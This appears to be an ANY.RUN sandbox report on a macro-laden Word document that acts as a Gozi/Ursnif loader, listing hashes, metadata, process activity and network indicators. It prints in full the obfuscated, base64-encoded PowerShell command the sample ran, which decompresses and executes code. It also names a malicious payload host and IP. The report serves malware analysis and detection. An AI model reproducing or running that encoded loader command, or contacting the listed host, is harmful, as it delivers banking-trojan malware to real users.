analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

info_08.21.doc

Full analysis: https://app.any.run/tasks/86f0fa25-a802-4593-90fd-ce167557c514
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: August 25, 2019, 15:17:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
gozi
ursnif
loader
malscr-1
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: New Document, Subject: 1, Author: PC\\8491, Comments: 386, Template: Normal, Last Saved By: Windows, Revision Number: 7, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Tue Aug 6 10:17:00 2019, Last Saved Time/Date: Wed Aug 21 10:02:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

B50C96087A052359257DE76A3D1831A3

SHA1:

97DA5723F37B27CB993463369AB3918479DF2D30

SHA256:

D30D0713C9331B98DDD21A15024FBD4F5196C34C4899C2C9A3B7457E4E59E010

SSDEEP:

1536:GoUgAEpTog0yQEDF3Rz9d0DU/UkCVxCm8:cgAEVog0UMDUMkCVxR8

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes scripts

      • WINWORD.EXE (PID: 3488)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3488)
    • URSNIF was detected

      • powershell.exe (PID: 2524)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • WScript.exe (PID: 3916)
    • Creates files in the Windows directory

      • WINWORD.EXE (PID: 3488)
      • powershell.exe (PID: 2524)
    • Creates files in the user directory

      • powershell.exe (PID: 2524)
    • Removes files from Windows directory

      • powershell.exe (PID: 2524)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3488)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3488)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: New Document
Subject: 1
Author: PC\\8491
Keywords: -
Comments: 386
Template: Normal
LastModifiedBy: Пользователь Windows
RevisionNumber: 7
Software: Microsoft Office Word
TotalEditTime: 1.0 minutes
CreateDate: 2019:08:06 09:17:00
ModifyDate: 2019:08:21 09:02:00
Pages: 1
Words: -
Characters: 1
Security: None
CodePage: Windows Cyrillic
Manager: PC
Company: -
Bytes: 27648
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 1
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • ffwmamztsi
  • ffwmamztsi
HeadingPairs:
  • Title
  • 1
  • Название
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
3
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs wscript.exe no specs #URSNIF powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3488"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\info_08.21.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3916"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\cBPdLsN_fWDXbFcCXJR.js" C:\Windows\System32\WScript.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.8.7600.16385
2524"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Enc IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtACgAWwBzAHkAUwB0AGUAbQAuAEkATwAuAE0ARQBNAE8AcgBZAHMAdAByAGUAQQBtAF0AWwBzAFkAUwBUAGUATQAuAEMATwBOAFYAZQByAFQAXQA6ADoARgBSAG8ATQBCAGEAcwBlADYANABzAHQAcgBpAG4ARwAoACcARABjAHEAeABDAG8ATQB3AEUAQQBEAFEAWAA4AGsAZwBuAE4ATAAyAFEAdQB4AFEAVQBLAFMARAB0AGwAQQBRAEoAOABIAEYASQBVAGEAdgBHAEYARQBUAGIAUwBDAGwAWAAxACsAbgB0ADcAegBBAGsAOABvAHcAaABCAFYATwBRAFAANQBpAEQAdABSAEUAdgBZAE8ASQBWAFMAUgByAGkAUQAwAHAAbQBaAGUAYQBxAGoAcABsAHcAWgBHAHgATQBNADEAYQBtAHEANQA0AHYAcwBwAEgAQwBLAE4AegBOAHUASAA4AEoAMgBLAHYAdgBKADQAWAAyAHIARQAzAEMAOQAvAGMAMwBuAEgAbgB0AGgAMwB0AGEATwA5AHoAWgBqAGIAOQB2AHUASQBrAFkAagBnAHoAeQBKAE8AMgAwAGUAdABnAC8ASwBlAHQAYQBiAEgAdABUAFMAQgA5AEMAYQBMADAARAB3AD0APQAnACkAIAAsAFsAcwBZAHMAVABlAG0ALgBpAG8ALgBjAE8ATQBwAFIAZQBTAHMAaQBPAE4ALgBDAG8AbQBwAHIAZQBzAHMASQBPAE4ATQBPAEQARQBdADoAOgBEAEUAQwBvAG0AcAByAGUAUwBTACAAKQB8ACYAKAAnAGYAJwArACcAbwByAGUAJwArACcAYQBjAEgAJwApAHsAIAAmACgAJwBOAEUAVwAtAG8AYgAnACsAJwBKACcAKwAnAEUAYwBUACcAKQAgACAAaQBgAG8ALgBgAFMAYABUAHIAZQBhAG0AUgBFAEEARABFAFIAKAAkAF8ALABbAHMAeQBTAFQAZQBtAC4AVABFAHgAVAAuAEUATgBjAG8AZABJAG4ARwBdADoAOgBhAHMAQwBpAGkAKQAgAH0AfAAuACgAJwBGAG8AcgBFAGEAJwArACcAQwAnACsAJwBIACcAKQB7ACQAXwAuAHIAZQBBAGQAVABvAEUATgBEACgAKQAgAH0AIAApACAAfAAuACgAJwBJAGUAeAAnACkAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 458
Read events
982
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
1
Unknown types
3

Dropped files

PID
Process
Filename
Type
3488WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9BA8.tmp.cvr
MD5:
SHA256:
2524powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NJZXW56O5RO44LSK669E.temp
MD5:
SHA256:
3488WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:4B2952C01D68B39BD8886D73907C721D
SHA256:B0EFB79D88759B0A60BA3F86E3BE3DE82BBBDEBCEC1529FF886433D5ED8C9D4A
3488WINWORD.EXEC:\Windows\Temp\cBPdLsN_fWDXbFcCXJR.jstext
MD5:A232368EBE94253A9908D76148D14ED4
SHA256:AC5E2DD857310C7A48AAC3BCE1A91F17A7A1E0A7506DA7C3D23763F00CB3F5D5
2524powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16a77f.TMPbinary
MD5:0F2CAD9746414ABA31294C3B560FCFD5
SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15
3488WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$fo_08.21.docpgc
MD5:32F56F62977A120B5B413B65F9666EF9
SHA256:7AB02E77B7A459A151B77AB3AA586087553A72CF5CA2A55289BAD0AAF40C026E
3488WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:62F2DA178DD59EBA6B61EE250E55F925
SHA256:8CF938206B83D51659082A32A71F3A9F077217F5A2E07A98541350C60245A244
2524powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0F2CAD9746414ABA31294C3B560FCFD5
SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2524
powershell.exe
GET
404
45.128.204.172:80
http://z12wbwilmer.com/qtra/ttqr.php?l=oqif3.j12
unknown
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2524
powershell.exe
45.128.204.172:80
z12wbwilmer.com
malicious

DNS requests

Domain
IP
Reputation
z12wbwilmer.com
  • 45.128.204.172
malicious

Threats

PID
Process
Class
Message
2524
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MalDoc Requesting Ursnif Payload
1 ETPRO signatures available at the full report
No debug info